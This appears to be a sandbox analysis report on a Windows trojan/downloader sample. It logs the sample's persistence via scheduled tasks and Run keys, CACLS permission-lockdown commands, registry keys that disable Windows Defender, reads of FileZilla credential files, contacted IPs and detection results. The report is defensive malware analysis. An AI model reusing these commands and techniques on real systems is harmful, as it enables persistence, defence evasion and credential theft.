RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (3 events)

host	77.91.124.31
host	77.91.68.3
host	77.91.68.56

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService July 18, 2023, 7:16 a.m.	service_handle: 0x000000001a8e5870 service_name: None control_code: 1		0	0
ControlService July 18, 2023, 7:16 a.m.	service_handle: 0x000000001a8e5ab0 service_name: None control_code: 1		0	0

Installs itself for autorun at Windows startup (11 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto135.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod25.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\an.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000032051\an.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW July 18, 2023, 7:16 a.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Creates a slightly modified copy of itself (2 events)

description	Possibly a polymorphic version of itself				file	{u'size': 399872, u'yara': [{u'strings': [u'Y2Vzc29y'], u'meta': {u'date': u'2021-05-13', u'update': u'2021-06-22', u'description': u'UPX packed file', u'author': u'r0d'}, u'name': u'UPX_Zero', u'offsets': {u's55': [[395115L, 0], [395429L, 0]]}}, {u'strings': [u'MAA0ADAAOQAwADQAQgAwAA==', u'R2V0Q3VycmVudFByb2Nlc3M=', u'R2V0Q3VycmVudFRocmVhZA==', u'R2V0UHJvY0FkZHJlc3M=', u'VGVybWluYXRlUHJvY2Vzcw=='], u'meta': {u'date': u'2020-10-20', u'hash': u'3ed2826a1e5d25a48f0d2e92c687317f', u'description': u'Win32 Trojan Emotet', u'mURLs': u'http://kitecorp.ca/wp-includes/kEI98N/', u'author': u'r0d'}, u'name': u'Win32_Trojan_Gen_1_0904B0_Zero', u'offsets': {u's3': [[28956L, 1], [31134L, 1]], u's1': [[29322L, 3]], u's6': [[393990L, 0]], u's5': [[31088L, 4]], u's4': [[31156L, 2]]}}, {u'strings': [u'TVNDRgAAAADW3AMAAAAAACwAAAAAAAAA'], u'meta': {u'description': u'CAB archive file'}, u'name': u'CAB_file_format', u'offsets': {u'mscf_h3xstring': [[140400L, 0]]}}, {u'strings': [u'R2V0TW9kdWxlRg=='], u'meta': {u'date': u'2021-03-11', u'description': u'Malicious_Library', u'author': u'r0d'}, u'name': u'Malicious_Library_Zero', u'offsets': {u'o77': [[28916L, 0]]}}, {u'strings': [u'TVo='], u'meta': {u'ini_date': u'2020-06-03', u'description': u'PE File Signature', u'author': u'r0d'}, u'name': u'PE_Header_Zero', u'offsets': {u'signature': [[0L, 0]]}}, {u'strings': [u'R2V0Q3VycmVudFByb2Nlc3M=', u'R2V0UHJvY0FkZHJlc3M=', u'UnVuRExM'], u'meta': {u'date': u'2021-01-06', u'description': u'Win32 Trojan Emotet', u'author': u'r0d'}, u'name': u'Win32_Trojan_Emotet_RL_Gen_Zero', u'offsets': {u's2': [[28956L, 0], [31134L, 0]], u's1': [[29322L, 1]], u's5': [[28956L, 0], [31134L, 0]], u'o1': [[1515L, 2], [26722L, 2]], u's4': [[28956L, 0], [31134L, 0]]}}, {u'strings': [], u'meta': {u'description': u'(no description)'}, u'name': u'IsPE32', u'offsets': {}}], u'sha1': u'86af675636a0bd6d5dacae77ae52a70db69e63fa', u'name': u'65aec89160d3b5fb_fotod25.exe', u'filepath': u'C:\\Users\\test22\\AppData\\Local\\Temp\\1000031051\\fotod25.exe', u'sha512': u'2ea0dce488912576380777401aef7b761935d2b30f1436d4b3db6b4aa0c3118903d28b653d2f904d0d5e79e6950561aa5a8d09ec4fd38b2d31e067c7528eca2c', u'urls': [], u'crc32': u'8069DED7', u'path': u'/home/cuckoo/.cuckoo/storage/analyses/43092/files/65aec89160d3b5fb_fotod25.exe', u'ssdeep': u'6144:Key+bnr+qp0yN90QEg4WtXJ0gGTlp2qQOw/5H0CcHnlRHitwGi0W9VH/U:qMr2y90OEBTmTOwhHlcHnl9uW9Zs', u'sha256': u'65aec89160d3b5fb66dcbf68a30b9036d8e5a286e62c9814126d56646217fadd', u'type': u'PE32 executable (GUI) Intel 80386, for MS Windows', u'pids': [2788], u'md5': u'35ee20deda8aa895f1608ebafc14f564', u'virustotal': {u'summary': {u'error': u'resource has not been scanned yet'}}}
description	Possibly a polymorphic version of itself				file	{u'size': 398848, u'yara': [{u'strings': [u'Y2Vzc29y'], u'meta': {u'date': u'2021-05-13', u'update': u'2021-06-22', u'description': u'UPX packed file', u'author': u'r0d'}, u'name': u'UPX_Zero', u'offsets': {u's55': [[394463L, 0], [394777L, 0]]}}, {u'strings': [u'MAA0ADAAOQAwADQAQgAwAA==', u'R2V0Q3VycmVudFByb2Nlc3M=', u'R2V0Q3VycmVudFRocmVhZA==', u'R2V0UHJvY0FkZHJlc3M=', u'VGVybWluYXRlUHJvY2Vzcw=='], u'meta': {u'date': u'2020-10-20', u'hash': u'3ed2826a1e5d25a48f0d2e92c687317f', u'description': u'Win32 Trojan Emotet', u'mURLs': u'http://kitecorp.ca/wp-includes/kEI98N/', u'author': u'r0d'}, u'name': u'Win32_Trojan_Gen_1_0904B0_Zero', u'offsets': {u's3': [[28956L, 1], [31134L, 1]], u's1': [[29322L, 3]], u's6': [[393338L, 0]], u's5': [[31088L, 4]], u's4': [[31156L, 2]]}}, {u'strings': [u'TVNDRgAAAABM2gMAAAAAACwAAAAAAAAA'], u'meta': {u'description': u'CAB archive file'}, u'name': u'CAB_file_format', u'offsets': {u'mscf_h3xstring': [[140400L, 0]]}}, {u'strings': [u'R2V0TW9kdWxlRg=='], u'meta': {u'date': u'2021-03-11', u'description': u'Malicious_Library', u'author': u'r0d'}, u'name': u'Malicious_Library_Zero', u'offsets': {u'o77': [[28916L, 0]]}}, {u'strings': [u'TVo='], u'meta': {u'ini_date': u'2020-06-03', u'description': u'PE File Signature', u'author': u'r0d'}, u'name': u'PE_Header_Zero', u'offsets': {u'signature': [[0L, 0]]}}, {u'strings': [u'R2V0Q3VycmVudFByb2Nlc3M=', u'R2V0UHJvY0FkZHJlc3M=', u'UnVuRExM'], u'meta': {u'date': u'2021-01-06', u'description': u'Win32 Trojan Emotet', u'author': u'r0d'}, u'name': u'Win32_Trojan_Emotet_RL_Gen_Zero', u'offsets': {u's2': [[28956L, 0], [31134L, 0]], u's1': [[29322L, 1]], u's5': [[28956L, 0], [31134L, 0]], u'o1': [[1515L, 2], [26722L, 2]], u's4': [[28956L, 0], [31134L, 0]]}}, {u'strings': [], u'meta': {u'description': u'(no description)'}, u'name': u'IsPE32', u'offsets': {}}], u'sha1': u'bb7817dc4d59037d9aa942987b7a7c0f5e194545', u'name': u'7717b5f9eb7e9015_foto135.exe', u'filepath': u'C:\\Users\\test22\\AppData\\Local\\Temp\\1000030051\\foto135.exe', u'sha512': u'f48b8e3a0035df039e02897c0203906008ef6e019e17c212bd5fcc4adbbfe93b598713f500c82669144874a5b40ae23497032f7dda579992f25b6c4030fd0e99', u'urls': [], u'crc32': u'3ED81E09', u'path': u'/home/cuckoo/.cuckoo/storage/analyses/43092/files/7717b5f9eb7e9015_foto135.exe', u'ssdeep': u'6144:KKy+bnr+Ip0yN90QE03tQ3dNyVO12awYaH3tL/8bQ925r6buUY6ZT:GMrYy90W3tQVo9dLUs25r6kKT', u'sha256': u'7717b5f9eb7e90158829187d4638c22ab972fa0338e253e849344a3be7ad7081', u'type': u'PE32 executable (GUI) Intel 80386, for MS Windows', u'pids': [2788], u'md5': u'da62c14c61da785a72fccc6938d29828', u'virustotal': {u'summary': {u'error': u'resource has not been scanned yet'}}}

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\3ec1f323b5" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	CACLS "danke.exe" /P "test22:R" /E
cmdline	CACLS "..\3ec1f323b5" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	CACLS "danke.exe" /P "test22:N"

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
CAT-QuickHeal	Trojan.Amadey
ALYac	Generic.Dacic.F96EFD6C.A.CECC337B
Malwarebytes	Generic.Spyware.Stealer.DDS
VIPRE	Gen:Variant.Doina.60313
Sangfor	Trojan.Win32.Save.a
K7GW	Spyware ( 0059955a1 )
K7AntiVirus	Spyware ( 0059955a1 )
VirIT	Trojan.Win32.GenusT.DNXI
Cyren	W32/Kryptik.JKR.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	multiple detections
Cynet	Malicious (score: 99)
APEX	Malicious
ClamAV	Win.Malware.Doina-10001799-0
Kaspersky	HEUR:Trojan-Downloader.Win32.Deyma.gen
NANO-Antivirus	Trojan.Win32.Deyma.jxeery
Avast	Win32:Evo-gen [Trj]
Rising	Stealer.Agent!1.E5F0 (CLASSIC)
F-Secure	Heuristic.HEUR/AGEN.1317762
DrWeb	Trojan.Siggen21.5885
TrendMicro	Trojan.Win32.AMADEY.YXDGGZ
McAfee-GW-Edition	BehavesLike.Win32.Dropper.fc
SentinelOne	Static AI - Malicious SFX
Jiangmin	Trojan.MSIL.aocbf
Avira	TR/Disabler.ocayi
Antiy-AVL	Trojan[Downloader]/Win32.Amadey
Gridinsoft	Trojan.Win32.Amadey.dg!se47453
Xcitium	ApplicUnwnt@#1ftfc2ja2g1dd
Microsoft	Trojan:Script/Phonzy.B!ml
SUPERAntiSpyware	Trojan.Agent/Gen-Downloader
ZoneAlarm	HEUR:Trojan-Downloader.Win32.Deyma.gen
GData	MSIL.Trojan.Disabler.F
Google	Detected
McAfee	Downloader-FCND!8C6B79EC436D
TrendMicro-HouseCall	Trojan.Win32.AMADEY.YXDGGZ
Ikarus	Trojan-Spy.MSIL.Redline
Fortinet	W32/Amadey.A!tr
AVG	Win32:Evo-gen [Trj]
Cybereason	malicious.ad5ed5
DeepInstinct	MALICIOUS

foto135.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All